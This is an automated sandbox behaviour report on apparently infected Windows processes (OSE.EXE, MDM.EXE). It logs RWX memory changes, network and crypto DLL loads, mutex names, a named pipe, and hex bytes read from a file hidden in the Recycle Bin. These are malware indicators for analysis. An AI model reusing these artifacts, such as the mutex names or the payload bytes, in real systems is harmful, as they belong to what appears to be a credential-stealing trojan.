Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311260846
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311261217
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2311261894
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311263039
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311267137
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311270333
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311270632
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2311272505
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2311273514
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2311285112
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311286207
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311290317
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311295029
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311299115
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311304079
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311308140
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311313815
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311317875
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311323032
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311327243
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311332014
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311336089
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311340937
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311345009
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311350850
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: B30000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2311355619
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311359731
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: B30000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2311364046
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311368731
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: B30000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2311373008
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2311376540
Thread created PID: 2000 TID: 3172 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Injected: false success or wait 2311378246
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2311381143
Thread delayed Time: 0 TID: 12882 success or wait 2312218778
Thread delayed Time: 0 TID: 12882 success or wait 2312274903
Thread delayed Time: 0 TID: 12882 success or wait 2312275404
Thread delayed Time: 0 TID: 12882 success or wait 2313968535
Thread delayed Time: 0 TID: 12882 success or wait 2313972475
Thread delayed Time: 0 TID: 12882 success or wait 2313975209
Thread delayed Time: 0 TID: 12882 success or wait 2315072456
Thread delayed Time: 0 TID: 12882 success or wait 2315077425
Thread delayed Time: 0 TID: 12882 success or wait 2315082006
Thread delayed Time: 0 TID: 12882 success or wait 2316191096
Thread delayed Time: 0 TID: 12882 success or wait 2316195725
Thread delayed Time: 0 TID: 12882 success or wait 2316200323
Thread delayed Time: 0 TID: 12882 success or wait 2317309683
Thread delayed Time: 0 TID: 12882 success or wait 2317314290
Thread delayed Time: 0 TID: 12882 success or wait 2317318874
Thread delayed Time: 0 TID: 12882 success or wait 2318429034
Thread delayed Time: 0 TID: 12882 success or wait 2318433766
Thread delayed Time: 0 TID: 12882 success or wait 2318438304
Thread delayed Time: 0 TID: 12882 success or wait 2319546904
Thread delayed Time: 0 TID: 12882 success or wait 2319551515
Thread delayed Time: 0 TID: 12882 success or wait 2319556354
Thread delayed Time: 0 TID: 12882 success or wait 2320665490
Thread delayed Time: 0 TID: 12882 success or wait 2320670006
Thread delayed Time: 0 TID: 12882 success or wait 2320674530
Thread delayed Time: 0 TID: 12882 success or wait 2321784117
Thread delayed Time: 0 TID: 12882 success or wait 2321788755
Thread delayed Time: 0 TID: 12882 success or wait 2321793264
Thread delayed Time: 0 TID: 12882 success or wait 2322902751
Thread delayed Time: 0 TID: 12882 success or wait 2322907304
Thread delayed Time: 0 TID: 12882 success or wait 2322911840
Thread delayed Time: 0 TID: 12882 success or wait 2324023241
Thread delayed Time: 0 TID: 12882 success or wait 2324028756
Thread delayed Time: 0 TID: 12882 success or wait 2324031497
Thread delayed Time: 0 TID: 12882 success or wait 2325143042
Thread delayed Time: 0 TID: 12882 success or wait 2325148292
Thread delayed Time: 0 TID: 12882 success or wait 2325151042
Thread delayed Time: 0 TID: 12882 success or wait 2326260502
Thread delayed Time: 0 TID: 12882 success or wait 2326265690
Thread delayed Time: 0 TID: 12882 success or wait 2326268451
Thread delayed Time: 0 TID: 12882 success or wait 2327377169
Thread delayed Time: 0 TID: 12882 success or wait 2327381801
Thread delayed Time: 0 TID: 12882 success or wait 2327386349
Thread delayed Time: 0 TID: 12882 success or wait 2328494961
Thread delayed Time: 0 TID: 12882 success or wait 2328496570
Thread delayed Time: 0 TID: 12882 success or wait 2328498190
Thread delayed Time: 0 TID: 12882 success or wait 2329613585
Thread delayed Time: 0 TID: 12882 success or wait 2329615243
Analysis File: MDM.EXE PID: 2224 Parent PID: 1636
+ Sections
+ General
Start time: 05:48:15
Start date: 01/12/2011
Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE
Commandline: C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
Imagebase: 0x400000
File size: 322120 bytes
MD5 hash: 11F714F85530A2BD134074DC30E99FCA
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\CRYPT32.dll write and read and execute unknown B30000 77824 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 BAE50FD
\KnownDlls\WS2_32.dll write and read and execute unknown 77B20000 73728 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 BAE50FD
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 BAE50FD
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown 900000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown 930000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit 930000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit 930000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit 930000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit 930000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 8F06B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
3312 2224 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE success or wait 1 8F0639
3268 2224 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE success or wait 1 BAD6140
3332 2224 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE success or wait 1 BAD6140
3368 2224 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE success or wait 1 BAD6140
3364 2224 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
12904 0s success or wait 201 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
3312 2224 success or wait 0 8F0279
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 1 8F05EC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2320893777
Thread created PID: 2224 TID: 3312 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Injected: false success or wait 2320897382
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2320898918
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: B30000 Size: 77824 Protection: readonly Mapped to pid: own pid object name not found 2320900745
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2320903801
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2320924551
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2320926384
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 2320937892
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2320939465
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2320951198
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2320952850
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2320957759
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 900000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2320963800
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2320970554
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2320979533
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2321144485
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2321148077
Thread created PID: 2224 TID: 3268 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Injected: false success or wait 2321157056
Thread delayed Time: 0 TID: 12904 success or wait 2321158746
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2321159324
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321160339
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321164897
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321166687
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAF6E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321167041
Thread created PID: 2224 TID: 3332 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Injected: false success or wait 2321169064
Thread created PID: 2224 TID: 3368 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Injected: false success or wait 2321171766
Thread delayed Time: 0 TID: 12904 success or wait 2321174143
Thread delayed Time: 0 TID: 12904 success or wait 2321174543
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321174726
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321175732
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321179524
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321181867
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BB10A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321182172
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321182481
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321183469
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321187226
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321189544
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321189847
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321190154
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321191207
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321195044
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321197497
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAFCF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321197804
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321198597
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321199592
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321203422
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321205756
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BB10168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321206062
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2321207010
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2321209156
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2321210503
